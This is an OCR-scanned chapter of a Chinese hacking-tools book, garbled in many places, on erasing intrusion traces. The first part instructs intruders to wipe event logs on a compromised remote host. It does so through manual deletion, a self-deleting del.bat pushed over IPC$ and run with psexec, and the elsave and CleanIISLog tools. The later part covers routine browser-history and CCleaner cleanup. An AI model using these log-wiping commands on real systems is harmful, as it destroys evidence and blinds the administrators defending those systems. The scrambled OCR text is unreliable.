从 安全 方面 来 看 ， 通 过 和 仔细 查看 日 志 ， 还 可 以 了 解 谁 对 哪些 站 点 进行 扫描 以 及 扫描 时 间 。 这 
是 因为 当 黑 客 扫描 网 站 时 ， 也 相当 于 对 网 站 进行 访问 。 访 访问 会 被 WebTrends 全 部 记录 下 来 ， 
网 络 管理 员 可 以 根据 日 志 来 防御 黑客 入 侵 攻 击 ， 所 以 要 养 成 查看 日 志 的 习惯 。 


9.2 ”清除 服务 器 日 志 
日 忘 的 增多 往往 会 加 重 服 务 右 的 负 人 和合 ， 所 以 要 及 时 删除 服务 右 的 日 记 。 删 除 服务 避 日 
忘 和 常用 的 方法 有 手工 删除 和 通过 批 处 理 文件 删除 。 


9.2:1 手工 删除 服务 器 日 志 


在 入 侵 过 程 中 ， 远 程 主机 的 Windows 系统 会 对 入 侵 者 的 登录 、 注 销 、 连 接 甚至 拷贝 文 
件 等 操作 进行 记录 ， 并 把 这 些 记录 保留 在 日 志 中 。 在 日 志文 件 中 记录 看 入 侵 者 登录 时 所 有 的 
账号 以 及 入 侵 者 的 卫 地 址 等 信息 。 入 侵 者 通过 多 种 途径 控 除 留 下 的 痕迹 ， 往 往 是 在 远程 被 控 
主机 的 “控制 面板 ”窗口 中 打开 事件 记录 窗口 ， 在 其 中 对 服务 器 日 志 进 行 手工 清除 。 
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ST IF 一 一 


合 人 人 他 


工具 全 攻略 


其 体 的 操作 步 又 如 下 。 


STEP01: 1PC$ 成 功 连 接 STEP02: 打开 “系统 和 安全 ”窗口 
所 | 汗 款 控制 面板 .。 桩 .， w | 他 
王 夏 方式 ， 剖 别 ~ sj 存储 空间 
管理 存储 谤 净 
工作 文件 夹 
管理 工作 文件 诡 
向 Windows Technical 
Preview 添加 功能 
二 找 并 级 “pi pe ele 各 5 新 版 Windows 的 更 记功 
Internet a 
1 | 罕 看 网 洛 柜 恋 和 尾 务 ”更 改 点 面 背 最 | 国 
选择 家 庭 组 和 共享 运 调整 界 莫 分 江 宇 计 其 中 生理 设 生 ， 
mi ; 时 钟 ， 语言 和 咎 二 四 事件 哪 计划 尾 知 
上 il 3 上 区 域 Flash Player 
在 远程 主机 的 “控制 面板 ”窗口 中 单 击 “系统 和 安 。 单 击 “ 管理 工具 ”链接 。 
全 ”链接 。 
STEP03: 查看 各 种 工具 SIEBRO4 和 打开 “计算 机 管理 ”窗口 


修改 日 明 
2U14A1TTS 


20147114 
aDiarii/a " 
201411 辣 “ 


eDaily 

a01411/4 

20arilia 

20147114 

aDiaii1a " 

2014 M1 
和 


习 上 


击 “ 计 算 机 管理 ”选项 。 开 “ 计 算 机 管理 { 本 地 ) ”>“" 系 统 工具 ”> " 事 
人 
STEP05: 查看 事件 类 型 STEP06: 查看 事件 实例 


Te 


= 和 而 与 来 源 无 关 ， 以 下 


打开 “管理 事件 的 摘要 ” 窗 格 ,查看 其 中 的 6 类 事件 。 选 定 某 一 类 型 的 日 志 ， 在 其 中 选择 具体 事件 后 右 
击 ， 选 择 “ 查 看 此 事件 的 所 有 实例 ”命令 。 
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STEP07: 查看 事件 具体 信息 STEP08: 删除 事件 


国 Fs 
8233 无 
8233 无 


“ 恬 - 出 -- 

二 EE 

村 机动 
避 忆 名 轴 


wr 
be 
Es 
pe 
和 it 
i a 
Ebr: 
br 
EN 
Mi 
Po be 
Cab rl 
ni 


EE rain 更生 二 时 和 门 尼 生 时 国明 ， 交 忆 


[En i 
EE 5 


查看 该 事件 出 现 的 次 数 及 相关 信息 。 在 弹出 的 “事件 查看 器 ”对 话 框 中 单 击 “是 ”按钮 


即 可 删除 此 事件 。 


9.2.2 ”使 用 批 处 理 清除 远程 主机 日 志 


一 般 情况 下 ， 在 Windows 系统 中 ,日 志文 件 的 扩展 名 为 “.log” 或 “.txt”， 这 样 就 可 以 
编写 一 个 批 处 理 文 件 来 实现 对 日 志文 件 的 清除 。 

具体 的 实现 步骤 如 下 。 

1) 编写 一 个 批 处 理 文件 del.bat 如 下 。 


Qdel c:winntsystem321ogfiles*.* 
Qdel c:winntsystem32config*.evt 
Qdel c:winntsystem32dtclog*.* 
Qdel c:winntsystem32* .Lod 

Qdel c:winntsystem32* .七 X 七 

Qdel c:winnt* .txt 

Qdel c:winntx .1Lod 

Qdel c:del.bat 


仿 。 在 上 面 的 代码 中 ，echo 是 DOS 下 的 回 显 命令 ， 在 它 的 前 面 加 上 “@” 前 级 


示 。 字符 ， 表 示 执 行 时 本 行 在 命令 行 或 DOS 里 面 不 显示 ; del 命令 是 删除 文件 命令 
2) 再 新 建 一 个 批 处 理 文 件 clean.bat， 其 具体 内 容 如 下 。 


Qcopy del.bat \S%1lcs$ 

eecho 问 肉 鸡 复 制 本 机 的 del .bat.….OK 

QPpsexec \%1 c:del.bat 

eecho 在 肉鸡 上 运行 del .bat， 清 除 日 志文 件 ..…..OK 


3) 假设 已 经 与 肉鸡 进行 了 IPC$ 连 接 ， 则 只 要 在 MS-DOS 命令 提示 符 窗 口中 输入 
“clean.bat 肉鸡 JP” 命 令 ， 束 可 以 清除 肉鸡 上 的 日 志文 件 了 。 
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提示 


全- 工具 全 攻略 
全 人 人 他 


9.3 Windows 日 志清 理工 具 


当日 志 为 用 户 记 录 大 系统 所 友 生 的 一 切 时 ， RB 
日 六 记录 又 令 用 户 茫 然 失 措 ， 他 们 需要 使 用 专门 的 工具 对 日 志 进 行 分 机 、 汇 总 ， 并 从 日 志 
记录 中 获取 有 用 的 信息 ， 以 便 针 对 不 同 的 情况 采取 必要 的 措施 。 

1. 使 用 elsave 清除 日 志 信 息 

elsave 是 一 知 由 小 榕 制作 的 清除 日 关 工 具 ， 使 用 该 工 具 不 仅 可 以 清除 本 地 计算 机 的 日 
志 ， 还 可 以 远程 删除 “事件 查看 器 ”中 的 相关 的 日 志 。 

命令 格式 为 elsave [-sNserver] [-1log] [-F file] [-C] [-q]， 其 中 各 个 参数 的 含义 如 下 。 

@ -sserver: 指定 远程 计算 机 。 
@ -]log: 指定 日 忘 类 型 ， 其 中 “application ”为 应 用 程序 日 志 ; 参数 “system” 为 系统 
日 志 ; 参数 “security” 为 安全 日 志 。 

@ -F file: 指定 保存 日 总 文件 的 路 径 。 

@ -C: 清除 日 坊 操作， 注意 “-C” 要 大 写 。 

@ -q: 把 错误 信息 与 入 日 志 。 

使 用 elsave.exe 删除 远程 主机 中 日 志 的 有 具体 操作 步骤 如 下 。 


STEP01: 将 elsave.exe 置 于 E 盘 根 目 录 STEP02: 输入 cmd 命令 


Windaws 梅 恨 据 竺 所 箭 六 的 名 称 ， 为 径 打 计 相 店 的 程序 . 
间 忻 过 ， 广 档 或 Imtermet 资源 ， 


instsry,exe elsave,exe 


下 载 elsave.exe 文件 后 将 其 解压 到 E 盘 分 区 的 根 目 打开 “运行 ”对 话 框 ， 单 击 “ 确 是 ” 
录 下 。 输入 cmd 命 令 。 按钮 。 
STEP03: 建立 IPC$ 连 接 STEP04: 清除 日 志 


管理 员 : CN\Windows\system32\cmd,exe 困 管理 员 : CNWindows\system32\cmd.exe 


Hicro oft Hindows [MR 本 6. 1 .7688] 本 er oft Windows [hh 6.1.7688] ry 
所 权 7 所 有 ‘cy 2009 Microsoft Corporaktion。 悍 留 所 有 权利 。 he 有 有 《ecy 2889 Nicrosoft Corporation。 慰 馈 了 所 有 有 并 梓 


“192.168.59.128%ipcs 123 /user:Joh [TE -0 


Gs "Users™“dlohn, 
1 4 1) i 一心 


3 “192.168.59.128 一】 "system" 


0 1 4 et tb ee 


在 窗口 中 输入 与 目标 计算 机 建立 |PC$ 连 接 的 命令 ， 


人 输入 “e:” 后 按 依次 输入 清除 应 

ee 

Lis es <Enter> 键 ， 切换 用 程序 、 系 统 和 安 
至 FE 熏 根 目 。 全 日 志 的 命令 。 
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STEP05: 断 开 IPC$ 连 接 


本 I] 管理 员 : i 


保留 所 有 权利 。 


Os“sers™“lohnSnet use “i192.168.59.128™%ipcs 123 AuserF:John 
Te 庆生- 
证 机 功 完 成。 


"lo.168.59.128 一 "application -0 
ll1bd.59.128 -1 "system -tt 
ss M92.168.59.128 -1 "security" -C 
\192.168.59.128\ipc$ /de 输入 与 目标 计算 机 断 开 IPC$ 连接 的 命令 ， 然 后 按 
59.128 pe 已 壹 制 除 ， <Enter> 键 。 


z 认识 1IPC$ 
© IPC$ 是 为 了 实现 进程 间 通 信 而 开放 的 命名 管道 ， 通 过 提供 可 信任 的 用 户 账户 和 
提示 密码 来 连接 双方 ， 以 建立 安全 的 通道 并 交换 数据 ， 从 而 实现 对 远程 计算 机 的 访问 ， 


2. 使 用 CleanIISLosg 清除 日 志 信息 
和 藻 想 清理 系统 、 安 全 与 程序 日 志 ， 也 可 利用 CleanIISLog 工具 。 由 于 该 程序 可 直接 进 
Ey 理 ， 不 需要 将 此 程序 上 传 到 目标 服务 器 中 运行 ， 利 用 已 可 以 主 理 Windows 的 一 般 
日 志 , 包括 系统 日 志 (System Log)、 安 全 日 志 (Security Log ) 与 程序 运行 日 志 (Applications 
Log )。 
的 命令 格式 为 : np [Ncomputername] <-app /-sec /-sys>。 
表示 应 用 程序 日 志 。 
-Sec: 表示 安全 日 志 。 
@ -sys: ee 
下 和 面 评 细 介绍 清除 日 志 的 步 又 。 


STEP01: 将 CleanllSLog.exe 置 于 E 盘 根 目 录 STEP02: 建立 |PC$ 链 接 


较 管理 疝 : CWindows\system32\cmd,ewe 


Mic :POS A Windows [he 六 本 <- 二。 区 于 
he 机 所 有 《ecy 28B9 Nicrosoft Corporation。 悍 留 所 有 相 利 。 


C= "lasersa™lohn}net use “92.168.59.128"ipcs 123 Auser:dohn 


instsrv,exe SaVE, ENE CleanllSsLog.exe 


下 载 CleanllSLog.exe 文 件 后 将 其 解压 到 E 盘 分 区 的 ”在 窗口 中 输入 与 目标 计算 机 建立 |PC$ 连 接 的 命令 ， 
根 目 录 下 。 然后 按 <Enter> 键 。 


177| 


STEP03: 清除 指定 日 志文 件 STEP04: 断 开 IPC$ 链 接 


国 | 管理 员 : CAWWindawsWsysterm32cmd exe 
Hicrosoft Windows [I 本 6.1.7680] 
hh 有 ce》 2889 Hicrosoft Corporations。 尾 留 所 有 权利 。 


一 一 


Gz“eers "lohne: 


1 


-Dpen File 


CleanllsLog Ver 加 -二 by Nasassin 2881. ll Rights Reseryued. 


和” 归 笑 六 时 和 记性 。 
| 1 吓 


四 让 而 Le 。 Ep hj 
吉 唤 Ey | 和 py 
pen Service Failed 一 1 en hin al ipes /el 
: M192.168.59.128\ipc$ 已 经 删除 。 
Hots Loy File WINDOWSUPDIATE. LOG,.. Open File Eryvor Rs 


三 三 入 而 和 让 


| 
输入 清除 关于 所 有 |IP 地 址 的 WindowsUpdate.log 文 ”输入 与 目标 计算 机 断 开 IPC$ 和 连接 的 全 令 ， 然 后 按 
件 的 命令 ， 按 <Enter> 键 。 <Enter> 键 。 


CleanllSLog 使 用 的 局 限 性 
© 与 elsave 相 比 ，CleanIISLosg 在 使 用 上 有 着 局 限 性 ， 即 CleanISLosg 只 能 在 本 地 


计算 机 中 运行 ， 并 且 运 行 该 软件 的 账户 必须 具有 管理 员 权 限 . 


9.4 ”清除 历史 痕迹 

在 使 用 计算 机 的 过 程 中 ， 系 统 会 将 用 户 在 计算 机 上 的 所 有 操作 都 记录 下 来 。 一 方面 用 
户 可 以 方便 地 查阅 以 前 的 操作 ， 另 一 方面 这 些 记 录 也 会 被 黑客 利用 。 为 了 保护 计算 机 的 安 
全 ， 用 户 需 要 定期 清理 系统 中 保存 的 各 种 历史 痕迹 。 


9.4.1 清除 网 络 历史 记录 


在 默认 情况 下 ，IE 浏览 器 具有 目 动 记录 的 功能 ， 利 用 该 功能 可 以 将 用 户 输入 的 一 
些 表单 信息 和 浏览 网 页 等 信息 记录 下 来 ， 这 样 可 以 提高 用 户 浏览 重复 网 页 和 进行 重复 
性 输入 的 效率 。 但 是 ， 这 也 给 黑客 提供 了 方便 。 下 面 将 介绍 如 何 请 除 了 正 浏 览 器 中 各 种 
历史 记录 。 

1. 清除 Cookie、 历 史记 录 

用 户 在 访问 网 站 时 , 了 正 浏 览 需 会 目 动 将 用 户 访问 过 的 网 页 保存 到 系统 的 History 文 
件 夹 中 ， 这 样 用 户 束 可 以 通过 该 文件 来 了 解 某 段 时 间 内 浏览 的 所 有 网 页 记录 。 为 了 避 
侈 上 网 隐私 的 泄露 ， 有 必要 清除 访问 网 页 的 历史 记录 。 下 面 介 绍 清除 网 页 历史 记录 的 
操作 步骤 。 
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STEP01: 打开 IE 浏览 器 STEP02: 打开 “|nternet 选项 ”对 话 框 

Internet 选项 li 

打印 (P) kb : 
常规 程序 
文件 (PH) 
缩放 (Z) (10096) » 人 若 要 创建 条 个 主页 选 硕 卡 ， 请 在 每 行 输入 一 个 地 址 BR) 。 
A http://hao.360.cn/?z1002 < 
安全 (9) 
将 网 站 滩 加 到 “开始 ” 茉 单 ([M) 
音 春 下 载 (MI) Ctrl+)J 司 从 上 次 会 话 中 的 选项 卡 开始 旬 ) 
3 醒 从 主 册 开始 外) 
管理 加 载 项 (M) 选项 卡 
F12 开发 人 员工 具 (L) ee 选 向 卡 (I) 
转 到 已 国定 的 网 站 (G) 文件、 历史 记录 .Cookie、 悍 存 的 过 码 和 加 页 表单 信息 。 
RE 回 退出 时 醒 除 浏览 历史 记录 遇 

兼容 性 视图 设 辕 (B) 
近 言 网 站 由 者 (R) | ME 
关 丁 Intarnet Explorer(A) 


选择 “工具 "> “|nternet 选 项 ”菜单 命令 。 单 击 "删除 ”按钮 
STEP035 打开 “删除 浏览 历史 记录 ”对 话 杠 


瘟 降 浏览 访 史 记录 


“人 aa 号 bo 必 Hj 文 件 ， 以 使 你 收藏 的 也 让 能 够 保 
保卫 呈 黄 半 提 吉 芝 汪 


临时 Internet 交 件 和 网 站 交 件 (IT) 
为 快 速 查看 而 保存 的 闷 页 、 图 盘 和 媒体 的 副本 


加 Coakie 和 了 网 站 
全 e281 存在 你 计 抽 上 勾 选 “Cookie 和 网 站 数据 " “历史 记录 ”等 复 


各 站 的 列表 。 选 框 。 


癌 下 载 历 史记 录 GD) 
你 已 下 载 的 交 件 的 列表 。 


表单 教 据 企 ) 
和 和 下 键入 的 信息 。 


一 柳 员 aidgasaa， 自动 填充 保存 的 密码 。 
1 跟踪 保护 、Aectiwvex 第 选 和 “De Hot Track” ”数据 人 疏 
A oot rsd 请 
国 单 击 “删除 ”按钮 ， 即 可 清除 保存 在 网 页 中 的 
Cookie、 历 史记 录 等 。 


2. 清除 表单 和 密码 记录 
在 默认 的 情况 下 ，IE 浏览 器 启用 了 “自动 完成 ”功能 。 该 功能 极 大 地 方便 用 户 快 
速 输入 相同 的 内 容 ， 但 黑客 也 会 利用 保存 的 用 户 名 和 密码 信 息 来 窃取 用 户 的 数据 。 从 
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安全 角度 出 发 ， 
体操 作 步 又 如 下 。 
STEP01: 打开 “Internet 选项 ”对 话 框 


ee 控制 | 可 查看 的 Internet 内 容 。 可 了 安全 EE | 


证 书 


-使 用 加 室 这 接 和 标识 的 证 书 
自动 吉成 一 一 一 一 一 一 一 一 一 一 一 一 


i 


谋 : Std Re 设置 iy) | 


[确定 = | | 二 取消 = | [应 用 的 =| | 
单 击 “ 设 置 ”按钮 。 
STEP03: 清除 以 前 的 表单 和 密码 记录 


和 i 临时 文件 ， 以 使 你 收藏 的 网 站 能 够 保 
由 网 必 吕 坟 生 扫 二 总 生 洲 E 


和 


[| Cookie 和 网站 
入 2 i 性 能 而 存储 在 你 计算 机 上 的 


| 口 历史 记录 00) 
已 访问 Ph 列表。 


站 下 载 历 史记 录 (WY) 
你 已 下 载 的 文件 的 列表 。 


和 和 村 中 键入 的 信息 。 


加 (F) 
yd, 自动 填充 保存 的 密码 。 


选 和 “De Hot Track” 糙 


人 i | 
苔 如 站 轩 济 失 Do Wot frack’” 洁 时 训 


an 
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需要 清除 表单 并 取消 目 动 记录 表单 的 功能 。 清 除 正 浏览 髓 中 表单 的 具 


STEP02: 打开 “自动 完成 设置 ”对 话 框 


i ”会 列 出 可 能 与 你 以 前 键入 或 访问 的 条 目 相 
自动 元 成 功能 应 用 于 


回 地 址 栏 &) 
| 浏览 历史 记录 0) 
收藏 夹 0 
|_] 源 让 ) 
| 使 用 Windows 搜索 获得 更 好 的 结果 印 ) 
URL 攻关 联 想 岂 ) 
回 表单 全 ) 
口 ee EF) 


辆 取消 勾 选 所 国 单 击 “ 确 国 单 击 “删除 自动 
有 的 复 选 框 。 定 ” 按 钮 。 完成 历史 记录 "按钮 。 


单 击 “ 删 除 ” 按 钮 ， 即 可 删除 以 前 保存 的 表单 和 密 
码 记录 。 


< 
入 侵 痕 迹 清除 技术 


3. 清除 已 访问 链接 颜色 

当 单 击 网 页 上 一 个 链接 后 ， 该 链接 束 会 变 成 男 外 一 种 颜色 ， 以 标识 该 链接 被 访问 
过 ， 这 样 可 以 避免 重复 访问 已 经 访问 过 的 链接 。 但 不 同 颜色 的 链接 也 会 导致 用 户 的 隐 
私 洪 露 , 因为 它 很 明显 地 标识 出 用 户 访 问 的 网 页 。 清 除 网 页 中 已 访问 链接 颜色 的 具体 
操作 步骤 如 下 。 


STEP01: 打开 “Internet 选项 ”对 话 框 STEP02: 打开 “辅助 功能 ”对 话 框 


常 坝 ”| 安全 [隐私 | 内 容 [连接 [程序 | 高 级 |] 上 『[ 痢 式 化 


主页 | | re 
着 要 创 尘 多 个 主页 选项 卡 ， 请 在 每 行 输入 一 个 地 址 (8) 。 器 知 略 网 页 上 指定 的 颜色 C) 


https//hao.360.cn/?z1002 记 | 外 略 网 页 上 指定 的 字体 样式 名 


了 [| 知 略 网 页 上 指定 的 字号 马 ) 
[使 用 当前 页 C) | [使 用 默认 值 E) | | 
启动 用 户 梓 式 表 
回 从 上 次 会 话 中 的 选项 卡 开始 8) 四] 使 用 样式 去 编 排 冯 档 格式 向) 
加 从 主页 开始 00 ] -一 一 
选 硕 卡 一 一 一 一 一 一 一 | mB) .. 
更 改 网 页 在 选项 卡 中 的 显示 方式 。 
浏览 历史 记录 
量 除 临时 文件 、 历 史记 录 、coekis、 保 存 的 密码 和 网 页 表单 信息 。 
同盟 出 时 删除 浏览 历史 记录 bm) 


外 观 


在 “常规 ”选项 卡 中 单 击 “ 辅 助 功 能 ”按钮 。 取消 勾 选 所 有 复 选 框 。 圈 单 击 “ 确 定 " 按钮 。 
STEP03: 返回 “|nternet 选项 ”对 话 框 STEP04: 打开 “颜色 ”对 话 柱 


Internet 选项 


个 3 若 要 创建 竹 个 主页 选 硕 卡 ， 请 在 每 行 输入 一 个 地 扯 储 )。 
i httPsWyhac.360.cm/3zl1002 
女 字 代 ) : 3 
背景 创 ): | 
回 从 上 次 会 十 中 的 选项 卡 开始 血 ) 访问 过 的 I): 到 | 
夯 从 主页 开始 轴 Ye 
选项 卡 未 访问 的 0): | 
更 改 网 页 在 选项 卡 中 的 显示 方式 。 县 信 站 | 
浏览 历史 记录 - i 
删 陈 蛋 时 文件 、 历 史记 录 、Ceokis* 悍 存 的 密码 和 网 页 表单 信息 
口 旭 出 时 星 除 浏览 历史 记录 审 ] 
外 现 


| 


单 击 “颜色 ”按钮 。 单 击 文字 “背景 “访问 过 的 ”未 访问 的 色 框 。 
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客 ;过 
-工具 改 了 


信人 人 
STEP05: 选取 顾 色 


汉 
[由 


基本 
加 
回 
国 
加 
加 


画面 司 辐 | 
面 面 面 司 司 司 
画面 而 一 司 
面 一 一 重 司 可 
司 一 面 国 面 置 


PC 
到 
届 


有 和 
1 


STEP06: 清除 已 访问 链接 闫 和 色 


2] [xe 


规定 自 定义 颜色 0) 


一 种 颜色 后 单 击 “ 确 定 ” 按 钮 。 


0.42 使 用 Windows 优化 大 师 进 


门 使 用 悬 停 颜色 0 


毅 色 
[| 使 用 Winadows 颜色 种) 


识字 (I): En 
背景 @B): 

优 问 过 的 人) 

未 访问 的 晤 )】 

量 但 上) : 


注意 将 访问 过 的 超 链接 和 未 访问 的 超 链接 设置 为 同 
样 颜色 ， 这 样 用 户 访问 过 的 链接 就 不 会 被 看 出 来 。 


并行 清理 


使 用 Windows 优化 大 师 不 仪 可 有 效 帮 助 用 户 了 解 自 己 的 计算 机 软 便 件 信息 ， 还 可 以 清 
理 系 统 运 行 时 产生 的 垃圾 、 修 复 系统 故障 及 安全 漏洞， 从 而 维护 系统 的 正常 运转 。 
使 用 Windows 优化 大 师 删 除 各 种 历史 记录 的 具体 操作 步骤 如 下 。 


STEP01: 打开 Windows 优化 大 师 


起 瑚 使 间 区 依 志 俩 ?西周 看 时 们 一 第 入 衣 自己 的 中 脑 齐 郁 蔚 械 高 = 


B | TITIYE 
pe es 
| 
BR: Neroacsh Biralot 7 Umaye FRI 
ln EBLL 本 机 各 Pen Crateort 和 牛人 了 hi 
= 隔 寅 | 总 日 此 二 逢 DDRY L333 FAH ) 
炉 世 汪 了 是 胃 吉 志 : 0038 [NR 1140956B] 
和 访 一 圳 . 自 坟 民 履 


一 册 油 性 各 加 系 成 量 芋 . 创 届 与 当 灯 用 及 明 二 芝 全 


，。 大 二 向 . 清理 寺 辐 交 梓 
本 -者 香 课 自 


十 的 二 二 六 症 ， 师 坑 介 亲 的 而 用 至 辣 。 


癌 第 三 中 - 再 汪 中 刘 靖 袁 
一 树 洋 恒生 于 南 加 . 悍 护 佛 习 . 也 杆 系 觅 玩 志清 高 

第 四 步 - 犁 硅 直 鼎 囊 
一 同 至 于 下 竺 要 于 0 开 举 什 地 -为 昌 博 进一步 地理- 


一 | 量 
[二 于 ] 上 一 直属 的 工程 -一 到 尘 Rn i i 


查看 Windows 优 化 大 师 的 各 个 功能 。 
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STEP02: 打开 “历史 小 迹 清理 ” 面 


Ei 


单 击 " 历 。 国 选择 需要 扫描 。 问 单 击 “ 扩 
史 痕 迹 清理 "的 项 目 (也 可 以 ” 描 " 按钮 。 
按钮 。 单 击 “ 全 选 "。 


< 9 章 


入 侵 痕 迹 清 除 技 术 


STEP03: 查看 扫描 历史 痕迹 STEP04: 删除 历史 记录 


Windows 优 化 广 师 [| 


eli 


习 国 司 Iniemet Erplceer 后 周记 困 清 理 
男 葵 Frei 历史 记 时 请 


昌国 司 Opers 乓 哇 过 昌 直入 说 明 : Windows 优 化 大 炳 棕 要 测 除 所 有 扫描 到 的 历史 记录 痛 迹 ,确定 


引 画 蜗 Ge Chnoms 历 下 这 虹 再 理 
加 订 Wirdees 重用 症 玫 
3” ET 通 记 对 融和 所 册 记 投 


” 吧 ? 


站 读 量 玉 行 的 各 走 历 宇 沁 时 
国 局 裕 件 站 天 恒 保 和 两 于 这 遇 
司 四 | 都 口 首 圳 导 广 小羽 雪 池 遇 
本 月 醒 并 计 其 F 中 启东 

1 屋 记 项 忆 ET 交友 所 二: 己 蝇 


DALYriemet 屁 S 立 囊 YCOrienbETUEHGECIHNCRID 果 让 且 呈 
[1 
Cr lr WC ret ETLY ey 
Enhprmad 及 半 六 证 or GolosPublriilbim 
u Cilnteme ont IE SIL YH spp eo maonicnf ll] is 
[a 
DELWUEsTH 用 钊 普 是 和 Orpent IE JERNECHMOR Al 
CDWUntbpmet 网 时 六 是 Non ET AROUH Mm 
Bilinbemet 邮 轩 六 二 orhentjl Tra bubbletihi 
ElVriaeTeH EE or TAR Me 
Dir rt ES pi 
Ershprmad 及 讲 六 于 grt RI 
DELWPier EN 证 Corerl]E TC IU Pg 


正在 所 是 II 靖 证 :5 TUE 临时 安 健 Wan ssn JPET J ll] et 


在 扫描 的 过 程 中 会 将 扫描 的 各 种 历史 痕迹 显示 在 列 。 单 击 “ 确 定 ”按钮 ， 即 可 删除 扫描 出 来 的 全 部 历史 
表 中 ， 待 扫描 结束 后 ， 单 击 “ 全 部 删除 ”按钮 。 记录。 


0.43 ”使 用 (CCleaner 清除 系统 垃圾 


CCleaner 是 一 于 系统 优化 和 隐私 保护 工具 ， 主 要 功能 是 清除 Windows 系统 ws 
用 的 垃圾 文件 ， 以 节省 更 多 便 稚 空间。 其 为 一 主要 功能 是 清除 使 用 者 的 上 网 记录 。 
工具 可 以 对 临时 文件 夹 、 历 史记 录 、 回 收 站 等 进行 垃圾 清理 ， 0 
项 扫 摘 、 清 理 。 

使 用 CCleaner 清除 系统 垃圾 的 具体 步骤 如 下 。 


STEP01: 打开 CCleaner STEP02: 扫描 本 地 计算 机 的 临时 文件 


本 Biferm CElem : Froleiionadl Editen 二 Ee sl Fintarm COhrarar 。 Prefeisional Ediiam 


[i | Celeaner Professional wira 


Wrdow | 硬 丽 种 永 ] | 
BB ntrmet Faplerrr s 各 是 党 成 全 .0 场 入 | 


国 | memat 本 让 时 npc 二 
区 本 司 酝 外 1 二 的 宇 习 rr 


Cer 
# 安 翌 


勾 选 “自动 完成 表单 历 蝎 单 击 "分 析 ” 图 查看 临时 文件 。 
史 ” 复 选 框 。 按钮 。 
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时 pe 
全 人 人 他 


STEP03: 删除 临时 文件 STEP04: 删除 完成 


本 Pinganm [Crarar - prefeesioraal Elitiors 


CCleaner Professional vw :7 x 


| 这 个 过 程 将 会 永久 删除 您 系统 上 的 这 些 文件 . 
您 确定 要 维 续 风 ? 


| | Was | 店 同 秆 康 | 
二 ntermet Euplorer 


局 eemat Eglorer - Foerat 彼 8 朗 伯 


四 riemet Epiorer 瑟 由 


男 眶 用 哈 序 i 


门 | 不 再 显示 此 信息 
单 击 “ 确 定 ” 按钮 ， 即 可 删除 扫描 出 来 的 临时 文件 。 “清除 完成 ”提示 信息 。 
STEP05: 清除 应 用 程序 中 的 历史 记录 STEP06: ”分析 完成 


本 Paifenm ECeaner - Prolesaional Edition 


ccleaner Professional .17 


浊 李 宾 陋 - 全. 交 1 种 |} 
醒目 的 ,到 条 的 裤 间 此 计 人 


要 到 和 文件 的 洋 引信 息 主意 ; 此 时 于 来 覃 xp 


en i 加 | 归 泛 斩 六 EM 机 | 可 wees 吉大 亿 理 吕 . 是 近 林 开 的 交集 3 ”3 十 妆 际 

-ed 欧 史 ein - 页 最 放 的 下 载 位 于 三 和 六 -临时 误 件 2 全 司 中文 健 
ret Epi = ead 站 本 了 Hh 

有 msc 朵 二 管理 四 - 吕 近 林丹 的 六 牺 至 卫 

启 系 氏 . 商 衬 回 庆 站 L734 地 二 


区 hire Brrr BO 0 

Cf Baty 上 

rk 画 直 用 程序 Often 3009 
画 后 用 程序 -UlrsEdt 


外 一 一 


国 在 “应 用 程序 ”选项 卡 中 = 查看 应 用 程序 中 存在 的 运行 清 
勾 选 需要 扫描 的 应 用 程序 。 析 ” 按 钮 。 ”各 种 历史 文件 。 洁 器 ”按钮 。 


国 加 0 忆 | 除 历 史 文 件 STEP08: 删除 完成 


到 bianm Cleener - Prolbeppsnal Erber 


已 了 人 的 和 本 钙 昨 


| 地 wrdoevet 许 汤 已 昌 关 - -最 阁 打 开 的 六 时 pr 下 诗 四 
渍 wndew 次 管理 当 .类 时 图 请 施 3.6 。 + 直 六 和 
TT ;0 加 0 赴 克 了 


回 不 再 显示 此 信息 


单 击 “确定 ”按钮 ， 即 可 删除 扫描 出 来 的 历史 文件 。 查看 已 删除 的 历史 文件 。 ” 单 击 “ 注 册 表 ”按钮 。 
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STEP09: 扫描 注册 表 


单 击 “扫描 问题 ”按钮 。 


国 *+ “注册 表 " 按钮 区 


STEP11: 选择 是 否 备份 


CCleaner 


若 须 备份 ， 
STEP13: 


打开 “缺失 的 共享 DLL” 对 话 框 


各 引 汶 站 之 用 但 是 并 不 存在 
WwW1.0.3705Ww nt,dl DL 
这 些 通常 是 在 扼 乾 软 件 村 


解 志 方法: 量 队 该 注册 表 值 , 


1 / 1825 


显示 扫描 的 第 一 个 注册 表 错 误 的 详细 信息 ， 在 其 中 
可 看 到 具体 的 解决 办 法 ， 单 击 “ 修 复 所 有 选 定 的 问 
题 ”按钮 。 


入 侵 痕迹 清除 技术 


STEP10: 正在 扫描 


本 用 Farm CECHarar - Prefenalornal Ednism 


ccoleaner Professional 


ee 
问 虹 豆 杜 
大志 的 夫 训 名 1 : iredrer lnoood HET rametls Lh I 
足 亦 的 竹 床 UL 启迪 radonws 让 boschiHET 下 rmaeecetis L170 
聘 计 上 的 着 家 BL :reliesch HET rine i. 于 RE 
蹄 让 的 着 若 DLL 忆 : 册 ra reaoAl HET Fraseraiils i dy. Te 
融 志 的 填 厌 局。 让 训 radrierecn hET rile Sd JR 
跌 志 的 站 理 CUL ira re ET rie 让 JE 
酸 记 的 六 大 司 L 站 :dwrescthHET 下 Tec 让 了 
足 南 的 由 章 CU 后 ind 让 orgeg 站 JHET 和 Dear 全 是 
醉 志 的 七 麻 EL ind HET ri 让 于 MP 
陆丰 航 站 过 UL :indows erosodt HET ram li TRE 
本 遍 的 了 硅 UL :和 ror rHET rer ls i 2 
味 雪 的 直达 史记 仙 rkrradof HET Tt i A 
串 砚 的 牢 曼 UL 世 : 让 ragrin Piles Towentyd td Ua.wal 
-上 本寺 一 
柄 遍 的 站 厌 避让 和 gem Plies Toes entg.en 
[Et 忆 L re Fes HT eaerd ee HE Pre ™ 
na 和 


本 国有 让 i 剖 

司 所 辽 记 动 是 放行 吗 
下 | 开 蚁 录 单 且 厚 

回 Hl 恤 丰 


国 高 夯 审 补 
国 wen 乳 英 


" 网 忆 同 问 网 网 网 网 网 网 网 司 网 网 网 网 


竺 扫描 完 竺 后 ， 选 中 需要 修复 的 问题 ， 并 单 击 “ 修 
复 所 选 的 问题 ”按钮 。 


STEP12: 存储 备份 文件 


博 珊 方式 交 性 于 ~ 


Lhhy 


ppDiata Eirel 
i Neeattudsg 
BA Dre 
Tm 


加 和 总 生 [Ty | Reg Fles ("egh 


ww 
， 单 击 “ 保 存 ” 按 钮 。 


”三 草 立 性 产 


在 设置 保存 名 称 和 位 置 后 
STEP14: 修复 问题 


